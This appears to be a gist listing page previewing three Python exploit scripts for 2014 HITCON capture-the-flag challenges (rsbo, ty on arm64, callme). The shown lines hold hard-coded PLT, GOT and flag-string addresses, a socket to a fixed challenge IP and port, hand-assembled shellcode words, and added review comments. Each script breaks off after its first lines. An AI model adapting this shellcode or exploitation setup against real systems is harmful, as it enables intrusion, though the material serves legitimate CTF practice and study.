g05u / xpl_rsbo.py
Created Aug 18, 2014
Hitcon-ctf rsbo exploit
#!/usr/bin/env python
from struct import *
from nulllife import *
# Absolute addresses hard-coded for one specific build of the challenge binary.
# NOTE(review): values in the 0x0804xxxx range presumably mean a 32-bit image
# loaded at a fixed base; a position-independent build with address
# randomisation would make these constants stale. Confirm against the binary.
new_ebp = 0x0804a100    # name suggests a replacement frame-pointer value
plt_read = 0x080483e0   # names suggest PLT entries for read/open/write
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487d0   # name suggests the address of a flag-related string
g05u / xpl_ty_hitcon.py
Created Aug 18, 2014
Exploit ty (aarch64 - arm64) Hitcon-ctf
#!/usr/bin/env python
from struct import *
from nulllife import *
# Listing preview only: the script continues past these lines on the gist.
# Connects to the hard-coded remote endpoint given by the author; NullSocket
# comes from the third-party `nulllife` module, which is not shown here.
s = NullSocket("210.71.253.109", 9123)
# Author's note: shell address is 0x411468
# Each struct.pack("<I", ...) appends one little-endian 32-bit word; the
# trailing comments are the author's disassembly of that word.
# NOTE(review): `struct` is used by name, but only `from struct import *` is
# visible, which does not bind `struct` itself; presumably `nulllife`
# re-exports it. Confirm.
shellcode = struct.pack("<I", 0x90000000) # adrp x0, 0x411000
shellcode += struct.pack("<I", 0x91120000) # add x0, x0, #0x480
g05u / xpl_callme.py
Last active Aug 29, 2015
Callme hitcon-ctf exploit
#!/usr/bin/env python
from nulllife import *
import struct
# Payload bytes are requested from the third-party `nulllife` helper; the
# helper is not shown on this page, so what .get() returns is not visible here.
shellcode = NullShell(name='exec', arch='x86', os='linux').get()
# Hard-coded addresses for one specific build of the challenge binary.
# NOTE(review): the first name suggests a GOT slot for the stack-protector
# failure handler. If the script depends on that slot being writable, the
# target was presumably linked without full RELRO. Confirm against the binary.
stack_chk_got = 0x0804a018
message_data = 0x0804a070